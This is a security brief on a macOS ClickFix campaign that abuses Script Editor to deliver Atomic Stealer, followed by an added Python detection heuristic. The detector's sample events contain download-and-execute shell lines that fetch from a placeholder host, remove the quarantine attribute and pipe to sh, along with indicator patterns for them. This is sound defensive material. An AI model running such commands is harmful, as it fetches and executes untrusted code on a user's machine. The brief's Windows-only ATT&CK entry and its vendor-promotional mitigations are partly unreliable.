Executive Summary
In April 2026, a new macOS malware campaign emerged, leveraging the Script Editor application to deliver the Atomic Stealer (AMOS) malware. Attackers employed a variation of the ClickFix technique, directing users to malicious websites that prompted them to open Script Editor via the 'applescript://' URL scheme. This method executed obfuscated commands to download and run AMOS, which exfiltrated sensitive data including Keychain information, browser credentials, and cryptocurrency wallets. This incident underscores the evolving tactics of threat actors targeting macOS systems, particularly through trusted applications like Script Editor. The shift from Terminal-based to Script Editor-based ClickFix attacks highlights the need for continuous vigilance and user education to recognize and avoid such sophisticated social engineering schemes.
Why This Matters Now
The adaptation of ClickFix attacks to utilize macOS's Script Editor indicates a significant evolution in malware delivery methods, bypassing traditional security measures and exploiting user trust in built-in applications. This trend necessitates heightened awareness and updated defensive strategies to protect sensitive data on macOS systems.
Attack Path Analysis
The attack began with users visiting compromised websites that prompted them to open the macOS Script Editor via the 'applescript://' URL scheme, leading to the execution of malicious scripts. Upon execution, the script downloaded and ran the Atomic Stealer malware, granting the attacker unauthorized access to the system. The malware then moved laterally within the system, accessing various directories and applications to harvest sensitive data. It established a command and control channel to transmit the exfiltrated data back to the attacker's server. The exfiltrated data included Keychain passwords, browser cookies, and cryptocurrency wallet information. The impact of the attack was the unauthorized disclosure of sensitive personal and financial information, leading to potential identity theft and financial loss.
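The chain described above (Script Editor launched via a URL scheme, then a shell one-liner that downloads and runs a payload) has a recognisable process-tree shape that a defender can alert on. The following is an added example, not code from the original brief or from any vendor named in it: it walks a list of constructed process-creation events, flags shells whose ancestry includes Script Editor, and scores their command lines for download-and-execute indicators. The event field names, the sample events and the indicator weights are assumptions made for the illustration; the Script Editor binary path is the standard one on current macOS.

```python
"""Heuristic detection of Script Editor-driven download-and-execute chains.

Added example (not from the original brief). Walks constructed process
events, finds shells whose parent chain reaches Script Editor, and scores
their command lines for ClickFix-style indicators. Field names, sample
events and weights are assumptions for this illustration.
"""
import re
from dataclasses import dataclass, field

SCRIPT_EDITOR = "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"
SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript"}

# Indicators typical of a download-and-run one-liner; each carries a weight.
INDICATORS = [
    (re.compile(r"\bcurl\b.*\s-[a-zA-Z]*s"), 2, "curl silent download"),
    (re.compile(r"base64\s+(-[dD]|--decode)"), 2, "base64 decode of embedded payload"),
    (re.compile(r"\|\s*(sh|bash|zsh)\b"), 3, "pipe to shell"),
    (re.compile(r"\bchmod\s+\+x\b"), 1, "marking download executable"),
    (re.compile(r"\bxattr\s+-[a-z]*d\b.*com\.apple\.quarantine"), 3, "quarantine attribute removal"),
    (re.compile(r"\beval\b"), 1, "eval of constructed string"),
]
ALERT_THRESHOLD = 4  # assumed tuning value; benign 'do shell script' use stays below it


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    exe: str
    cmdline: str


@dataclass
class Alert:
    pid: int
    score: int
    reasons: list = field(default_factory=list)


def has_script_editor_ancestor(pid: int, by_pid: dict) -> bool:
    """Follow ppid links upward until Script Editor or the root is reached."""
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        if cur.exe == SCRIPT_EDITOR:
            return True
        cur = by_pid.get(cur.ppid)
    return False


def score_cmdline(cmdline: str):
    """Sum indicator weights present in the command line and list which fired."""
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if pattern.search(cmdline):
            score += weight
            reasons.append(label)
    return score, reasons


def detect(events):
    """Return alerts for shells descended from Script Editor that score high enough."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        if e.exe not in SHELLS:
            continue
        if not has_script_editor_ancestor(e.ppid, by_pid):
            continue
        score, reasons = score_cmdline(e.cmdline)
        if score >= ALERT_THRESHOLD:
            alerts.append(Alert(e.pid, score, reasons))
    return alerts


# Constructed sample events (not real telemetry). example.invalid is a reserved name.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "/sbin/launchd", "launchd"),
    ProcEvent(200, 100, "/Applications/Safari.app/Contents/MacOS/Safari", "Safari"),
    ProcEvent(300, 100, SCRIPT_EDITOR, "Script Editor"),  # opened through a URL scheme
    ProcEvent(301, 300, "/bin/sh", "sh -c echo aGVsbG8= | base64 -d | sh"),
    ProcEvent(302, 300, "/bin/sh",
              "sh -c curl -fsSL http://example.invalid/p -o /tmp/u && chmod +x /tmp/u "
              "&& xattr -d com.apple.quarantine /tmp/u && /tmp/u"),
    ProcEvent(400, 100, SCRIPT_EDITOR, "Script Editor"),
    ProcEvent(401, 400, "/bin/sh", "sh -c ls -la ~/Documents"),  # benign do shell script
    ProcEvent(500, 200, "/bin/sh", "sh -c curl -fsSL http://example.invalid/x | sh"),  # not via Script Editor
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"pid {a.pid}: score {a.score}, {', '.join(a.reasons)}")
```

The ancestry check is what keeps the rule specific to this campaign: the same indicators fired from a browser-spawned shell (pid 500 in the sample) are left to a broader rule, and a plain `ls` launched from a user's own script (pid 401) scores zero. In practice the `ProcEvent` records would come from an endpoint agent's process-creation telemetry rather than the inline list.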
Kill Chain Progression
Initial Compromise
Description
Users were tricked into opening the macOS Script Editor via malicious websites using the 'applescript://' URL scheme, leading to the execution of malicious scripts.
MITRE ATT&CK® Techniques
Command and Scripting Interpreter: AppleScript
User Execution: Malicious Link
Ingress Tool Transfer
Input Capture: GUI Input Capture
Masquerading: Match Legitimate Name or Location
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Archive Collected Data
Exfiltration Over C2 Channel
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
NIST SP 800-53 – Malicious Code Protection
Control ID: SI-3
PCI DSS 4.0 – Ensure all system components and software are protected from known vulnerabilities
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA Zero Trust Maturity Model 2.0 – User Training and Awareness
Control ID: Identity Pillar
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Computer Software/Engineering
Atomic Stealer's Script Editor abuse targets developer environments with cryptocurrency wallets, browser credentials, and Keychain data through ClickFix social engineering attacks.
Financial Services
InfoStealer malware specifically targets cryptocurrency wallets, browser-stored financial credentials, and payment data, compromising client financial information and regulatory compliance requirements.
Information Technology/IT
macOS-focused campaign exploits the trusted Script Editor application to bypass security controls, requiring enhanced egress filtering and anomaly detection for IT infrastructure protection.
Computer/Network Security
ClickFix attacks demonstrate sophisticated social engineering bypassing macOS protections, necessitating updated threat detection capabilities and zero-trust segmentation for security operations.
Sources
- New macOS stealer campaign uses Script Editor in ClickFix attack: https://www.bleepingcomputer.com/news/security/new-macos-stealer-campaign-uses-script-editor-in-clickfix-attack/
- Script Editor new entry point for ClickFix malware on Mac: https://appleinsider.com/articles/26/04/08/mac-script-editor-becomes-new-entry-point-for-clickfix-malware
- Infostealers without borders: macOS, Python stealers, and platform abuse: https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Aviatrix Zero Trust CNSF is pertinent to this incident as it could have limited the attacker's ability to move laterally and exfiltrate sensitive data by enforcing strict segmentation and controlled egress policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The CNSF may have limited the execution of unauthorized scripts by enforcing strict identity-based policies, thereby reducing the risk of initial compromise.
Control: Zero Trust Segmentation
Mitigation: Zero Trust Segmentation could have constrained the malware's ability to escalate privileges by enforcing least-privilege access controls, thereby reducing the attacker's operational scope.
Control: East-West Traffic Security
Mitigation: East-West Traffic Security may have restricted the malware's lateral movement by monitoring and controlling internal traffic, thereby reducing the attacker's ability to access additional resources.
Control: Multicloud Visibility & Control
Mitigation: Multicloud Visibility & Control could have detected and constrained unauthorized outbound communications, thereby reducing the effectiveness of the command and control channel.
Control: Egress Security & Policy Enforcement
Mitigation: Egress Security & Policy Enforcement may have limited the exfiltration of sensitive data by enforcing strict outbound traffic policies, thereby reducing the risk of data loss.
The implementation of Aviatrix Zero Trust CNSF controls could have reduced the scope of data exposure, thereby limiting the potential impact on affected individuals.
Impact at a Glance
Affected Business Functions
- User Data Security
- System Integrity
- Application Security
Estimated downtime: N/A
Estimated loss: N/A
Potential exposure of sensitive user data including Keychain information, browser credentials, and cryptocurrency wallet details.
Recommended Actions
Key Takeaways & Next Steps
- Implement Zero Trust Segmentation to restrict unauthorized access and limit lateral movement within the system.
- Enforce Egress Security & Policy Enforcement to monitor and control outbound traffic, preventing unauthorized data exfiltration.
- Utilize Threat Detection & Anomaly Response to identify and respond to malicious activities promptly.
- Deploy Inline IPS (Suricata) to detect and prevent the execution of known malicious scripts and payloads.
- Educate users on recognizing and avoiding social engineering tactics, such as malicious websites prompting script execution.